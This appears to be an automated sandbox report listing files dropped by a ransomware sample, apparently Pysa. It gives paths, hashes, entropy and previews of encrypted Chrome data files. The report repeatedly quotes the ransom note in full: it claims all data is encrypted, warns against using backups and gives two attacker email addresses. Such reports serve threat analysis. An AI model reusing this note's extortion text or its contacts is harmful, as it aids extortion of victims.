                  SHA-512:FAAB6B9EA2F7E6BCF9A8F96C498A025B68CAD9336BF20A54A3E9256FCAB6AD4164E57CE8F03ACAFF1B0E390A61ECFE975D0DD3A244D1819182E1FAAE5FE10690
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3..
                  C:\Users\user\AppData\Local\Google\Chrome\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):2132
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:48:6/8w4ArDPOjPCbLo8w4ArDPOjPCbLo8w4ArDPOjPCbLo8w4ArDPOjPCbLF:eNDPOmbLgNDPOmbLgNDPOmbLgNDPOmbJ
                  MD5:F5F6CB683017074FC644C8E039F1ED23
                  SHA1:BB512B1BE542FB549444448E5D715BD9B0EF5489
                  SHA-256:6D18BE05DC3A0BFE38098A6AA6BBBED5D79201E74284A476607D8393034966E6
                  SHA-512:D826D55297D01C40684AED444646C1890978B8C177CA8667C9BB646331AAC98C7644A45435003263C807FE0DA3098DB04684CC5320B851DC623CAD59C4B70A73
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3..
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\BrowserMetrics\BrowserMetrics-5F749CFD-12B4.pma.pysa
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):4098048
                  Entropy (8bit):7.999949797704385
                  Encrypted:true
                  SSDEEP:98304:Y07of2vo/aCEtb1mo8h0vuQmg9823PtmDMVvSYxHvchmwFG:YDf2vkxEtbhvXSDM8gvcswk
                  MD5:5303F589B1426BFCF97DE329141ACEC7
                  SHA1:DF8878492AD4DDF42950305C8B569BBA7DB78070
                  SHA-256:0A62AE9D7CE2F0E1DBEC4F7963AA6E375BB7F797C0576FA9ED1B4E1BFDCD8513
                  SHA-512:DAF2827041DCF722014CDEFF717933A16ACB00AE33D853F4C8EA5399154DE8878C4067F7F5090DAC6773CF4A24721FA88CD979DB860F169BAFC6DA6A2C50A4A0
                  Malicious:true
                  Preview: h...J..b.wi....e!.O.\.#.'..=.>/..u&F_&(..i.YL..e.G....H..M.u .t......+.v..W...T`$.++....x.Z...&&..6.>0q..}...:.-....*.........|..I4.}./..l...q.Xy..4Mn...<....N.~....K..A$.7<].7.=.R.'.a...h.A..N.I._.).?..........KGE.Z........M)...(.>x o..&.....!.........69cx...z{J....F....:`.".=sh5(x...~...|.!7:b....l..?.K0.qRF.|...=..l.|....KR]...L...[...T.............#...Fw..6."..~.G.w...lx.R.I......./s.4_....hS...AC...L..p..2...#.\...}..._ .>ba........`.....v...CW.iN..........R..E...&.l0...A..d..5.@.(.V....f$)...X.Y...E....|.*.+.R.G...|.v.7....&..&..@&.c8....}-6..X.)...ib*.SgJ....g>N.......K..?8.8.3.8.u.6Rr..+..2y......8.*..8.).:n..4<p...zdF..R...#Z..k.!.4.Z..a`f.j.k.........F......S."......OS..o..^.oG......(....0`...S..L.z...)....'3.M]}%l.f.ac.v.. S$.H.e<.$..l..ps.Rf.IM..Kj.L...93...g....8u..-.....l..7..B.m%.g...V..c..W.$c!..<_..x.....K.!Z.!.5.rQ..^{._..%V.fz.k6...a9m4g....CI;.....i..B!...ZS..x.0.;7.D.a.(...A4........2G*.....q......(.e......Mz.
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\BrowserMetrics\BrowserMetrics-5F749DC8-E1C.pma.pysa
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):4098048
                  Entropy (8bit):7.999950382048557
                  Encrypted:true
                  SSDEEP:98304:R3PjMTVMgVigalnS3YW5eW/SVgx43EwBAqp6Cb/lGGQ7Qui:xITVMgVill8YW5eW/SVgx5NcGGQ7ni
                  MD5:22455CD4D4F3FF25541B36E212C714C8
                  SHA1:8079443A65655C8C5FE0D051D40500D1296225FF
                  SHA-256:244A8C03D0CDC34139B439BA8DA7467AAEA5BE74939C3A9E6812A30FD63615F1
                  SHA-512:5BED0D5A6DA7BC8EC5BC2EA9A3428AF2EDAD659D4C5BA1393160AA22A8E85810921C8EE4815F1B9318D36B496FFC09D383DB632DAA9D82145DDC35DC1489550C
                  Malicious:true
                  Preview: ;t..> .N...b.."..f55...b.Q*.....L8v..7R.^RY..k..`O.......j}).....V/V....$........*......).L.Pp:&...{...x0.)....,...R...R...../....X...e.4E~../}.y...v.o..SD@s.p...'$...t`....0.Z...:3...}q....).#..g.Dv.".W.8.8(..h........s3..r.....BL.Q.........C..L..z0k..>...91.F.@.E0L....$L.UXR7........l.....M.......~..}O..V....?d.....`..q...A..e.8o.f...}-.._.K|.$..y.0..#.=S/...xb/.o.sD....(..#.C....{&"....D4...A....Q!D.Y..qw.F..n3.B.'W..;..f....m..a..A...g.c...v...[...fL....\.#.!./.=qN.2J.In.x.Ow....*.?..b{..*Z+..Y....R..(.".{.r.5l...+.o.....4...jip.bt....o6G..@R...FF._...VF..D..9.v..e3.f....J.[.rsL+e1Z...Fv..o[.'#.b.!.....#..G.4B.r..r.&.w.`.c...<.t3....1....Z.].}.:j._`.<......~.7?E..'.F..h4.)J.._...Es.@#..SHIw.....W\..6P..~.z.rB.......j.......~...0....l de)..Y>Bh..$..Z..is...'L[....R/...=oT8..HvQ....f.-..OJZ..N.&.R..-#.).O...6./g3....e..G..'8...tu[1j,..qO...c..Nk..Sv.'....8l.C.......\........P*U.....A....p.bv...t.%Vtr8..+....#......0.J.0.B...|.....s.d.d.....
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\BrowserMetrics\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):2132
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:48:6/8w4ArDPOjPCbLo8w4ArDPOjPCbLo8w4ArDPOjPCbLo8w4ArDPOjPCbLF:eNDPOmbLgNDPOmbLgNDPOmbLgNDPOmbJ
                  MD5:F5F6CB683017074FC644C8E039F1ED23
                  SHA1:BB512B1BE542FB549444448E5D715BD9B0EF5489
                  SHA-256:6D18BE05DC3A0BFE38098A6AA6BBBED5D79201E74284A476607D8393034966E6
                  SHA-512:D826D55297D01C40684AED444646C1890978B8C177CA8667C9BB646331AAC98C7644A45435003263C807FE0DA3098DB04684CC5320B851DC623CAD59C4B70A73
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3..
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\CertificateRevocation\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):2132
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:48:6/8w4ArDPOjPCbLo8w4ArDPOjPCbLo8w4ArDPOjPCbLo8w4ArDPOjPCbLF:eNDPOmbLgNDPOmbLgNDPOmbLgNDPOmbJ
                  MD5:F5F6CB683017074FC644C8E039F1ED23
                  SHA1:BB512B1BE542FB549444448E5D715BD9B0EF5489
                  SHA-256:6D18BE05DC3A0BFE38098A6AA6BBBED5D79201E74284A476607D8393034966E6
                  SHA-512:D826D55297D01C40684AED444646C1890978B8C177CA8667C9BB646331AAC98C7644A45435003263C807FE0DA3098DB04684CC5320B851DC623CAD59C4B70A73
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3..
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\CrashpadMetrics-active.pma.pysa
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):1026048
                  Entropy (8bit):7.999783556577424
                  Encrypted:true
                  SSDEEP:24576:H90eUJBJ+0ZEGQj9ucueT+res3o66VgrmdVXdbQN9:HgJXZER4cFmeYoD+rEVXdcN9
                  MD5:4DAEE97762C8CC4791F44E1199A36CC5
                  SHA1:DAD932562CACEF54E2C5A5ED18FD9A7AE557D5C1
                  SHA-256:B137F618B7978E8C66700CF0C20DF61555E8C558435B24ACA2145E16ED07DB30
                  SHA-512:0628984EDB94B3F1148FB15374FB2046B80AF5A2AF106FF4AFE81794F2CB93E4909D9FE6A71426B21EB82418C6D8A7FC38341F5A9C976C6944EB8E828114C5F9
                  Malicious:true
                  Preview: .....(.sLU.2;....y.8...NP.-o%.%WA.ll... ........D'.....^...#...F./...Rv.........#.53sY..c..FOp$QZ..)(.AMg.F.S.#.%.i....xY....P./..^.M.pu.! ..}.>.....:.%.CD6...[)...l.]..dQ.l..z..Zk./..>z.C.....@.<....>2.+3.4.)..E.l...n..2...T.'%m..)X..Fn+.tf.q. W...,...Z......2Tng..(..R...E..43..........>GrP{.N.....*.y...V..E[e.r.E....!......m............!_...].u.....{..^......"............#..g=.=B6P...?....a.o1y..X.q.7.....c..}....i.TQKD=A.....w.......0M;.i...,.|mv.$'vKS..{t.].s.}.x.....i8...q.5.:.".Q.mM.......<......!.:.0VmT?...9.....ZG......Z..<.b+...Cm....Xb....~}.H.\)..x;%.Z ..1.......p...;.Z[.....H.U.6..ui........+..8.Uc.qr.l....B....<..W~[..=Jg.A..U.0.)Y).~..}..)........X...5xk.<1N....o...*]>..q..;*.+.[...A.MP.=..\..B..5I...R..S*S...i..#2Ox..).....gc>}Y...>.M......,.g..>..`>.......@....}...C..OUa@....S..Fd,..X..aJ.@q..N.r2...{"u..`.b&d..s[....0...9%.}........Ij...^Tq.....Z..Y.|E@....~..p..7.>..!1..,...i.<..%.;a+30d>.F....r4.HJ.4.+=29.Pr2.<.d1).{f...
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\CrashpadMetrics.pma.pysa
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):1026048
                  Entropy (8bit):7.999760520637093
                  Encrypted:true
                  SSDEEP:24576:dOZ/9pFdCTJSd1octNdha8UGF4uJRPz61keJWz:deS9O1oCHt21cz
                  MD5:3A4DF2A53EFB70F061E9885EB1B6D0B9
                  SHA1:9A8E873BA059616C7334D9D62725E91331A28442
                  SHA-256:E868A3C0C78814F1F4E9893B7810AE83EF5511C9FAE7E774C3BB0CCBD61375AC
                  SHA-512:3242292236B3C0DC97E2EE8728098F5902AE987786C5FF360820DBA5F41298E9BB87D3742A73761D0AA85B582BEB82D40BBAB58B98926157B0F764750156ABAD
                  Malicious:true
                  Preview: ...!h}5..Dc...5t..........CHmY...H}..MnN.p..w....-.M-..q....yb/j.....F.I.P.....T...(H...y.E...L.`....No[..Yg^.#nO.D;UTA..@.&6#s .R.Z5Bq..6..]...F...d&!4....G.r......d_..2v+B..d>g<.?wPp;..z`s...'.......=..T.......@.FBy.).R.).c..Mr.i&$k....?..O.5Y.2......&.....&.w...L.y.dO..n^M.......r.".1{.).U.PF.Y#...\D+.Jw|......._.U7kv.s.(W....].M....f...F.2X^..F;...,.d....<k...W..{Q.G.QzNtQ.....\.S..*.@.h..7.\.F.~.s[U.0.8_.!..."H~.R.I|..svm.3xQ.\..X~v...Z........|EH.AP......}.].........3..Y...Fs?...d<.'../zs...L...5...S...]......cg...M%..d...d..324..p.<.+.9...I..t_h.[..m..d..$kb....Q....S..FO2j.^a0.S....[ .Y..QQ.V...[...l.+.:..+M....H.m.R~.......s....qy..58~..EW...+..^....y.... TM...x....xy_y-.2\>.Q..l.|......Zi..} ...W....3..e..1...p.6LB|2.......$f./.RN,..?....0#..A.....~.<.......H.(.e.....\N..C....4Z6.%..$.&o...6L.P....u....9.u.#.!..#m.....M.....H...y..SU[9....?}I..i..J8N})......V...:.}.....L.VBI>....e...d......s.[...O.,.......I^.:.#;.O.p.u...D.IYd.*
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Crashpad\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):2132
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:48:6/8w4ArDPOjPCbLo8w4ArDPOjPCbLo8w4ArDPOjPCbLo8w4ArDPOjPCbLF:eNDPOmbLgNDPOmbLgNDPOmbLgNDPOmbJ
                  MD5:F5F6CB683017074FC644C8E039F1ED23
                  SHA1:BB512B1BE542FB549444448E5D715BD9B0EF5489
                  SHA-256:6D18BE05DC3A0BFE38098A6AA6BBBED5D79201E74284A476607D8393034966E6
                  SHA-512:D826D55297D01C40684AED444646C1890978B8C177CA8667C9BB646331AAC98C7644A45435003263C807FE0DA3098DB04684CC5320B851DC623CAD59C4B70A73
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3..
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Crashpad\reports\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):2132
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:48:6/8w4ArDPOjPCbLo8w4ArDPOjPCbLo8w4ArDPOjPCbLo8w4ArDPOjPCbLF:eNDPOmbLgNDPOmbLgNDPOmbLgNDPOmbJ
                  MD5:F5F6CB683017074FC644C8E039F1ED23
                  SHA1:BB512B1BE542FB549444448E5D715BD9B0EF5489
                  SHA-256:6D18BE05DC3A0BFE38098A6AA6BBBED5D79201E74284A476607D8393034966E6
                  SHA-512:D826D55297D01C40684AED444646C1890978B8C177CA8667C9BB646331AAC98C7644A45435003263C807FE0DA3098DB04684CC5320B851DC623CAD59C4B70A73
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3..
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Crowd Deny\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):2132
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:48:6/8w4ArDPOjPCbLo8w4ArDPOjPCbLo8w4ArDPOjPCbLo8w4ArDPOjPCbLF:eNDPOmbLgNDPOmbLgNDPOmbLgNDPOmbJ
                  MD5:F5F6CB683017074FC644C8E039F1ED23
                  SHA1:BB512B1BE542FB549444448E5D715BD9B0EF5489
                  SHA-256:6D18BE05DC3A0BFE38098A6AA6BBBED5D79201E74284A476607D8393034966E6
                  SHA-512:D826D55297D01C40684AED444646C1890978B8C177CA8667C9BB646331AAC98C7644A45435003263C807FE0DA3098DB04684CC5320B851DC623CAD59C4B70A73
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3..
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\AutofillStrikeDatabase\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):1599
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:48:6/8w4ArDPOjPCbLo8w4ArDPOjPCbLo8w4ArDPOjPCbLF:eNDPOmbLgNDPOmbLgNDPOmbLF
                  MD5:33BAEE98E6812F33006EC1904131C43E
                  SHA1:6B21E5528FF8A4B3B5F2D1AC2E3D1849C273B648
                  SHA-256:81E8B5A8328AA847298DEE38F3C49EB5331F19C1E585E692AC61E1EDA731801A
                  SHA-512:3749BAE2D1F62FDB0758F23C75D14B3521825606513DD03C9B3CC1741A3E9A75FE519B3EF61302FBCD172F4CA8E325716897DFBE6B8B15246821E3034955162D
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3..
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\BudgetDatabase\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):2132
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:48:6/8w4ArDPOjPCbLo8w4ArDPOjPCbLo8w4ArDPOjPCbLo8w4ArDPOjPCbLF:eNDPOmbLgNDPOmbLgNDPOmbLgNDPOmbJ
                  MD5:F5F6CB683017074FC644C8E039F1ED23
                  SHA1:BB512B1BE542FB549444448E5D715BD9B0EF5489
                  SHA-256:6D18BE05DC3A0BFE38098A6AA6BBBED5D79201E74284A476607D8393034966E6
                  SHA-512:D826D55297D01C40684AED444646C1890978B8C177CA8667C9BB646331AAC98C7644A45435003263C807FE0DA3098DB04684CC5320B851DC623CAD59C4B70A73
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3..
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cache\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):2132
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:48:6/8w4ArDPOjPCbLo8w4ArDPOjPCbLo8w4ArDPOjPCbLo8w4ArDPOjPCbLF:eNDPOmbLgNDPOmbLgNDPOmbLgNDPOmbJ
                  MD5:F5F6CB683017074FC644C8E039F1ED23
                  SHA1:BB512B1BE542FB549444448E5D715BD9B0EF5489
                  SHA-256:6D18BE05DC3A0BFE38098A6AA6BBBED5D79201E74284A476607D8393034966E6
                  SHA-512:D826D55297D01C40684AED444646C1890978B8C177CA8667C9BB646331AAC98C7644A45435003263C807FE0DA3098DB04684CC5320B851DC623CAD59C4B70A73
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3..
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cache\data_0.pysa
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):46080
                  Entropy (8bit):7.977908644162314
                  Encrypted:false
                  SSDEEP:768:kb0E/3YtJvIPkiHGvM+jKzwGkniRV6xt1GfWhPilRx9qVEqy6mZs+5Q/e+hxmn3J:e0E/3Yt6rHG7KUGOx/Q+lrKTswQ/1EYy
                  MD5:02182EEC766BA320B01F57F003D38E4B
                  SHA1:92BBABD47B188F27B4D44F712E96784B607C3C47
                  SHA-256:4E5AF1B182825A7552E327B2594D86E86F85E849C8C7E99806563F04A6C0E077
                  SHA-512:0756CCECC90FC1FDEF6563407258AB75BFBD3A07AB9FCE5C2273B82A46478CD449881198EE152EA867379A4DBAF51343303571D8AECC379B6CB98209B2AD2C90
                  Malicious:false
                  Preview: `.^..F...l_...,..s/...X..!O....>.g...R!\....S..3.;....|.4-W^k......{../..Yl.Q.l....\7d.U$]H...I.yG..N+<.f.#n..NvU....|..'.....h\...W.ON.r..9I.F}......<.....k....jw..F..@.>5.W.9...iw....}...Gq..0...=.W.. ._..6q..!wA).o.g....\...bXvR.9.}.?g.-G.Mg/.*....|.y...~..SEV.Rn.6...Bq(..._ USN.T..i...&..G.b..v..@...2Q-....j..r"....0n...P.3.e....\f...7J..&....k.?..i..s...#s..o]..$....K..X.T5.[#.."..[]/v.GYd'#Q;'">i..2e.%..e.E..KJ........-wm:.db.,..6....h...././.j\....T|.8..`T.iB..i.8...........p P.8.e...r+...y.0Z.p1a..U....d.d..L..*Q.E.. |..p.l.${lUw..#.h........(&@.H.pj..y..]...t..-4.w)....D..q.?.=.Btc.....`.O.C.Qv"......~(..D_J.R......G~...k.......^....?.7...CB...6.pxZ.. ..-...^.O...xo..,....D..._t..j.{...6V..X]qF$;.~..H. ....m..e..o!Y......6.......M.L.I9g...0$...._)aY.+m...4.j...EP.'Uq.a.mp.H ...j.....=.Oi............2y..<..._.....v{.....>..-....8....$...o..L.....g.....f.l....r....t:....).}.r.M..e....|.S.n.0..M.;/i.-.iu..3.1.%Z..zU.....:.mMN.-......4
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cache\data_1.pysa
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):206848
                  Entropy (8bit):7.9980852407939516
                  Encrypted:true
                  SSDEEP:6144:zdrasXXv9AwvbkSg+Jvb24h404XGPkcn/2fZ:B3vaIvbDv4XGhn/2x
                  MD5:FF6B5BACDF0A524AB940136E7D709CAF
                  SHA1:199B3D0058EC2926CC8F2078801B431CD36044CD
                  SHA-256:67C22C26C57AFCFC2E2BD5866CB4F620B1E0CAB3F8B476AFE00749522A1AA3EC
                  SHA-512:15EC2C5981A431721FF39DE919AE7F4D17F0818CA9CBCAAA100591AFE3B63139B2C1DE5360A9EFEA6BA1648CA500950898FE3686405884481C58ECA7881A9B28
                  Malicious:false
                  Preview: j...\MdS.SW....l..._......IHo....0!j..rr....^..v..MH!..o.%.iP.lXJ@.h..^.v......f{.l..E....5.,....9:...=..R.(......H0P..(N5.;nK.!...`H.N.q...x.m<....U.(...Q~.X....||~...B.J@~.:`1...S.....e>...s..J..u!. .}./.`.c....v!?xD .g.|...Pz.Q..tv.....[.7<..B....D.........|".t|.....fA......6k. 94..4r.........HL.Q.......-+..h.2.~g.\x....1..,...........Gwv&"!...B.g.{`..g......RP...&G....I.l....i"L..4..R..-wi....^eM..;..m.FM..v.Q..[....x(.w..W..<..wA.....Kc).{..r.R...}.N:.x.8..f..]I..eR...Bt....1..Y.h7....tTYD..W*T..>TZP..7 .kTp........- .6.@.H.;av..hT.....j....^.....?WE..U...1.&.....N.. .&4=..Gs..k(....n...ORvh.P.o............U~.8.....0a?TN..+ .....|.~...U:......4..K...H2..S.i.'.......M-.#....&.>kc..-.g..s{7>..#....#6...>!i..C..\.i.[.........$.....r.A.%nL..{=.......4]'R...0..^........qo3...3.|......:*..j.^..?3.R.....Vz%.I....o.W..@.....q....`..-.l....]L~y....V|....J...K...].....,.o..J.k.y.....`(.s23cS.S..._,'..Qen....]..........).+'.U..v...F..C...Ck.o*......
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cache\data_2.pysa
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):1026048
                  Entropy (8bit):7.9997766068805465
                  Encrypted:true
                  SSDEEP:24576:XBw1FgvWzsbXOnmO2+fgUYg2l8RCraqbASiZvHBaA26Kv6HJhYULaJ:RS+vSsYtNgU2eWAHBaA2IwJ
                  MD5:D90C5ACE68AB2B35E83F0262B638EBD9
                  SHA1:82AAD11AFF8CA22B1683DDB75B937E05D8791170
                  SHA-256:43E0BC900AD8CE91188ED715CA3B6CEB212D3D0BE02E539221B4000AA7038FA3
                  SHA-512:BAA719483D8EE20F9CFAC845726407BB6A188021F74138AF5A9E2F8B1CAB90CE041C6B6B65FAFFAE076AB16F13DCC0FBBCA3C8878D6D3E83FF7F7070F4B7EF2E
                  Malicious:false
